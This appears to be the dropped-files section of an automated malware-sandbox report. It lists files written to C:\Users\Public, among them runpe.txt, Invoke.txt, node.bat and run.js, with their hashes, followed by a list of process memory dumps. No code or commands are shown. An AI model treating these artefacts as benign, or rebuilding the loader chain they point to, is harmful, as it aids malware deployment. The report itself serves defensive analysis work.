C:\Users\Public\Invoke.txt

Filesize
6B

MD5
5fb833d20ef9f93596f4117a81523536

SHA1
d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5

SHA256
e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73

SHA512
afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35

Download Submit
C:\Users\Public\NewPE2.txt

Filesize
9B

MD5
8a56a0e23dbfe7a50c5ec927b73ec5f2

SHA1
abebd513e68e63e7ec6ae56327c232b6e444ce0a

SHA256
3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1

SHA512
276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2

Download Submit
C:\Users\Public\getMethod.txt

Filesize
9B

MD5
db37f91f128a82062af0f39f649ea122

SHA1
f21110ae7ac7cde74e7aa59b22ed10bace35b06b

SHA256
e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32

SHA512
681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae

Download Submit
C:\Users\Public\load.txt

Filesize
4B

MD5
ec4d1eb36b22d19728e9d1d23ca84d1c

SHA1
5dbc716c4600097b85b9e51d6aeb77a4363b03ed

SHA256
0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0

SHA512
d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700

Download Submit
C:\Users\Public\msg.txt

Filesize
823KB

MD5
ed0230c521be611a107c1823a87675c5

SHA1
5ec7c222d388de04f6d172bee129e37949689dd2

SHA256
50c684b1927125914d24f476356f4b166e490303684eb15bf6dfff3e14c09ac8

SHA512
02b8f8c2e538016022ebe03ebf601f8a83a044059eec7a3a42a35b27b6685cf9740ac795cf76afd163ca76d334b4ea7722b24db8eef8f50b56e58e9b09aca418

Download Submit
C:\Users\Public\node.bat

Filesize
688B

MD5
65b406f5e6b0f364980c7c3220d795ed

SHA1
36b45778124d9218b1d29676bfcd0fbd9770f3a2

SHA256
e7f837e41ba38a6454f520544afd76021e518fe8679ba44cfdca93b9e00e9b5e

SHA512
48525c1f23d681513115547a01155a09478291719b0674188cd1c9f29c0c28596f3971c066033deb9140dacb5f1bbe49a7c920f357078da558036f853c01e21b

Download Submit
C:\Users\Public\run.js

Filesize
1KB

MD5
660c9112523248048eaf7d9f1ee30960

SHA1
3126188624a0299d3821ae3dd6411b4905ecfd0b

SHA256
81b60a632098a246910c001762b65d85e8c00ac88be7a38529e41bdd9ae51093

SHA512
effb1eb00acda9d51bb6de63604d96cb780a6e76e57fe48d67878089c894773ea41209060e7213e3f92d337e24e7f83a7ede6535bd84920d69af1a3e8d37e6e2

Download Submit
C:\Users\Public\runpe.txt

Filesize
3.8MB

MD5
afcc7cacf140469b858eaaca175fd3da

SHA1
5a0e7a65c86dbe0263f895397df93d4fd54d2ae8

SHA256
d09d8cbd5d77f224f31ff616d8c41e0202269092225e646464df3b42ff39a7ad

SHA512
7385fca6a5223bc9f0658fed6673a4547b1340c1b2160d6417e28a9f1da1998b2ce836620877f16a78a54db26f9538936dffc19c9c023db37a4912ade5b2bf18

Download Submit
memory/968-85-0x000001E8BB310000-0x000001E8BB52C000-memory.dmp

Filesize
2.1MB

Download
memory/2312-59-0x000001FD461F0000-0x000001FD4640C000-memory.dmp

Filesize
2.1MB

Download
memory/2312-33-0x000001FD468C0000-0x000001FD468CA000-memory.dmp

Filesize
40KB

Download
memory/2312-32-0x000001FD468E0000-0x000001FD468F2000-memory.dmp

Filesize
72KB

Download
memory/2536-201-0x0000000007390000-0x0000000007433000-memory.dmp

Filesize
652KB

Download
memory/2536-190-0x0000000006160000-0x00000000061AC000-memory.dmp

Filesize
304KB

Download
memory/2536-191-0x00000000704F0000-0x000000007053C000-memory.dmp

Filesize
304KB

Download
memory/2536-188-0x0000000005BE0000-0x0000000005F34000-memory.dmp

Filesize
3.3MB

Download
memory/2536-202-0x0000000007670000-0x0000000007692000-memory.dmp

Filesize
136KB

Download
memory/2908-215-0x00000000059E0000-0x0000000005D34000-memory.dmp

Filesize
3.3MB

Download
memory/2908-217-0x0000000006090000-0x00000000060DC000-memory.dmp

Filesize
304KB

Download
memory/3016-20-0x00007FFDB2F20000-0x00007FFDB39E1000-memory.dmp

Filesize
10.8MB

Download
memory/3016-4-0x00000192FE070000-0x00000192FE092000-memory.dmp

Filesize
136KB

Download
memory/3016-14-0x00007FFDB2F20000-0x00007FFDB39E1000-memory.dmp

Filesize
10.8MB

Download
memory/3016-3-0x00007FFDB2F23000-0x00007FFDB2F25000-memory.dmp

Filesize
8KB

Download
memory/3016-15-0x00007FFDB2F20000-0x00007FFDB39E1000-memory.dmp

Filesize
10.8MB

Download
memory/3016-16-0x000001929A5C0000-0x000001929A5E6000-memory.dmp

Filesize
152KB

Download
memory/3016-17-0x00000192FE040000-0x00000192FE054000-memory.dmp

Filesize
80KB

Download
memory/3660-122-0x0000000006A70000-0x0000000006AA2000-memory.dmp

Filesize
200KB

Download
memory/3660-139-0x00000000079E0000-0x0000000007A02000-memory.dmp

Filesize
136KB

Download
memory/3660-142-0x0000000007B70000-0x0000000007B84000-memory.dmp

Filesize
80KB

Download
memory/3660-134-0x0000000007490000-0x0000000007533000-memory.dmp

Filesize
652KB

Download
memory/3660-141-0x0000000007A10000-0x0000000007A32000-memory.dmp

Filesize
136KB

Download
memory/3660-133-0x0000000007470000-0x000000000748E000-memory.dmp

Filesize
120KB

Download
memory/3660-140-0x0000000008A40000-0x0000000008FE4000-memory.dmp

Filesize
5.6MB

Download
memory/3660-123-0x0000000070C50000-0x0000000070C9C000-memory.dmp

Filesize
304KB

Download
memory/3660-136-0x00000000077D0000-0x00000000077EA000-memory.dmp

Filesize
104KB

Download
memory/3660-121-0x00000000064F0000-0x000000000653C000-memory.dmp

Filesize
304KB

Download
memory/3660-120-0x00000000064A0000-0x00000000064BE000-memory.dmp

Filesize
120KB

Download
memory/3660-135-0x0000000007E10000-0x000000000848A000-memory.dmp

Filesize
6.5MB

Download
memory/3660-118-0x0000000005FD0000-0x0000000006324000-memory.dmp

Filesize
3.3MB

Download
memory/3660-138-0x0000000007A40000-0x0000000007AD6000-memory.dmp

Filesize
600KB

Download
memory/3660-108-0x0000000005E60000-0x0000000005EC6000-memory.dmp

Filesize
408KB

Download
memory/3660-107-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/3660-106-0x00000000054F0000-0x0000000005512000-memory.dmp

Filesize
136KB

Download
memory/3660-104-0x00000000056C0000-0x0000000005CE8000-memory.dmp

Filesize
6.2MB

Download
memory/3660-137-0x0000000007840000-0x000000000784A000-memory.dmp

Filesize
40KB

Download
memory/3660-103-0x0000000002ED0000-0x0000000002F06000-memory.dmp

Filesize
216KB

Download
memory/4112-174-0x00000000054F0000-0x00000000054FA000-memory.dmp

Filesize
40KB

Download
memory/4112-173-0x0000000005540000-0x00000000055D2000-memory.dmp

Filesize
584KB

Download
memory/4112-171-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/4324-146-0x000000002DC00000-0x000000002DC01000-memory.dmp

Filesize
4KB

Download
memory/4324-145-0x000000000D500000-0x000000000D501000-memory.dmp

Filesize
4KB

Download
memory/4524-204-0x0000000004E00000-0x0000000004E01000-memory.dmp

Filesize
4KB

Download
memory/4828-70-0x0000019131AD0000-0x0000019131AF6000-memory.dmp

Filesize
152KB

Download
memory/5068-170-0x00000000072E0000-0x000000000737C000-memory.dmp

Filesize
624KB

Download
memory/5068-169-0x00000000070C0000-0x0000000007112000-memory.dmp

Filesize
328KB

Download
memory/5068-160-0x0000000005D10000-0x0000000005D5C000-memory.dmp

Filesize
304KB

Download
memory/5068-158-0x0000000005890000-0x0000000005BE4000-memory.dmp

Filesize
3.3MB

Download